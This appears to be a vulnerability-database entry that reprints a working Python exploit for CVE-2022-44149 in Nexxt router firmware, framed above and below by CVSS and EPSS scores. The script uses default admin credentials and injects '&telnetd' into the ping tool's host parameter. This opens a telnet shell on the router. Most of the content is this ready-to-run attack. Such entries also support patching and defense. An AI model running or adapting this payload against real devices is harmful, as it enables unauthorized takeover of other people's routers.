CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.1%
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host = "http://192.168.1.1"
username = "admin"
password = "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def send_payload(payload):
url = router_host+"/goform/sysTools"
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}
requests.post(url, headers=headers, data=params)
if __name__ == '__main__':
main()
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.1%